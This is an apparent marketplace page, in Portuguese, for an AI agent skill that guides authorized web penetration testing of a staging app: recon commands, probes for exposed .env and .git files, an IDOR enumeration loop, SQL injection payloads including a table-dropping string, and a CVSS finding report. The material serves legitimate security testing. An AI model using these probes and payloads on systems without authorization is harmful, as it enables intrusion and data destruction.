Synaptic SkillsSynapticSkills
MarketplaceSkill GraphCriar SkillMCP ServerPlataformaEnterprise
v0.1.0-beta
Voltar ao Marketplace
SecurityAvançadoAuto-Sync

Pen Test Assistant

porTHIAGONOMA·THIAGONOMA· v1.1.0 · atualizado em 2026-04-12T22:48:33.474Z
83
Score

Auxilia em penetration testing ético com OWASP Testing Guide 2025: recon, vulnerability mapping, exploitation testing e relatório CVSS. Gera payloads de teste e checklists para OWASP Top 10.

penetration-testingowaspsecurityethical-hackingcvssvulnerabilityappsec
Linguagens
PythonShell
890Stars
89Forks
6.8KUsos
Fork

Documento do Skill

SKILL.mdpen-test-assistant/workflow
Passo-a-passo detalhado do skill, referenciando as fases cognitivas:
1
SENSE — Definir escopo e autorização
```
Rules of Engagement:
Target: https://staging.myapp.com (APENAS staging)
Janela: 09h-18h horário comercial
Fora do escopo: DoS, dados reais de usuários, infra de terceiros
Ponto de contato: security@myapp.com
Autorização: documento assinado anexo
```
2
CONTEXTUALIZE — Recon da aplicação
```bash
# Mapear endpoints
gobuster dir -u https://staging.myapp.com -w /usr/share/wordlists/common.txt
# Verificar headers de segurança
curl -sI https://staging.myapp.com | grep -Ei 'strict-transport|content-security|x-frame'
# Verificar arquivos sensíveis expostos
for path in .git/HEAD .env robots.txt api/docs swagger.json; do
status=$(curl -so /dev/null -w "%{http_code}" https://staging.myapp.com/$path)
[ "$status" = "200" ] && echo "⚠️ EXPOSED: /$path"
done
```
3
HYPOTHESIZE — Testar IDOR (A01)
```python
# Testar IDs sequenciais de outro usuário
import requests
headers = {"Authorization": f"Bearer {token_user_A}"}
for user_id in range(1, 100):
r = requests.get(f"https://staging.myapp.com/api/users/{user_id}", headers=headers)
if r.status_code == 200:
data = r.json()
if data.get('id') != current_user_id:
print(f"⚠️ IDOR: acessou dados de user/{user_id} com token do user {current_user_id}")
```
4
HYPOTHESIZE — Testar SQL Injection
```python
payloads = ["'", "1'--", "1' OR '1'='1", "1; DROP TABLE users--"]
for payload in payloads:
r = requests.get(f"https://staging.myapp.com/api/users?id={payload}", headers=headers)
if 'error' in r.text.lower() or 'sql' in r.text.lower():
print(f"⚠️ Potential SQLi with payload: {payload}")
print(f"Response: {r.text[:200]}")
```
5
RECOMMEND — Relatório de finding
```markdown
Finding: IDOR em GET /api/users/{id}
**Severidade**: High (CVSS 7.5)
**CVSS Vector**: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
### Descrição
Um usuário autenticado pode acessar dados de qualquer outro usuário
alterando o parâmetro {id} na URL.
### Steps to Reproduce
1. Autenticar como User A (user_id=42)
2. Enviar GET /api/users/43 com token do User A
3. Resposta retorna dados do User B (200 OK com PII)
### Impacto
Exposição de dados pessoais (nome, email, endereço) de todos os usuários da plataforma.
### Recomendação
Verificar server-side que req.user.id === params.id antes de retornar os dados.
```
6
REFLECT — Relatório final e remediação
Priorizar findings por CVSS: Critical (24h), High (7 dias), Medium (30 dias)
Verificar que nenhum payload destrutivo foi executado inadvertidamente
Reportar telemetria via mcp-skillschain

Telemetria de Agentes

Execuções
0
total
Taxa de Sucesso
0%
últimos 30d
Latência Média
0.0s
p50
Alucinação
0.0%
detecção
Tokens Entrada
0
avg 0/exec
Tokens Saída
0
avg 0/exec

Uso por Plataforma

Skills Relacionados

Depende deSecurity Scanner
24%
Hebbian Synapse
Composite0.240
w = 0.3·α + 0.5·β + 0.2·γ
89
Compõe comLog Analyzer
21%
Hebbian Synapse
Composite0.210
w = 0.3·α + 0.5·β + 0.2·γ
81
Compõe comAuth Flow Builder
21%
Hebbian Synapse
Composite0.210
w = 0.3·α + 0.5·β + 0.2·γ
88
Co-executedSecurity Scanner
40%
Hebbian Synapse
Composite0.400
w = 0.3·α + 0.5·β + 0.2·γ
89
Co-executed ←Log Analyzer
14%
Hebbian Synapse
Composite0.143
w = 0.3·α + 0.5·β + 0.2·γ
81
Co-executed ←Auth Flow Builder
41%
Hebbian Synapse
Composite0.409
w = 0.3·α + 0.5·β + 0.2·γ
88
Co-executed ←Authenticate Service
40%
Hebbian Synapse
Composite0.400
w = 0.3·α + 0.5·β + 0.2·γ
85

Árvore do Skill

Pen Test Assistant
pen-test-assistant
Fases Cognitivas6
1.SENSE: Percepção
2.CONTEXTUALIZE: Contextualização
3.HYPOTHESIZE: Hipótese
4.EVALUATE: Avaliação
5.RECOMMEND: Recomendação
6.REFLECT: Reflexão
Triggers15
penetration testpen testsecurity testethical hackingvulnerability assessmentteste de penetraçãosecurity auditowasp testingsql injection testxss testcsrf testapi security testauth bypass testidor testsegurança web

Avaliar este Skill

Score Breakdown

⭐Avaliação Humana0%
🤖Sucesso de Agentes0%
🕐Atualidade100%
🔗Saúde de Dependências100%
🕸️Centralidade no Grafo0%
🛡️Segurança50%
CompositeScore = α·Humano + β·Agente + γ·Recência + δ·Deps + ε·Centralidade + ζ·Segurança

Instalação

$ synaptic mcp download pen-test-assistant
$ synaptic skills detail pen-test-assistant
$ synaptic skills live pen-test-assistant

Links

GitHub Repository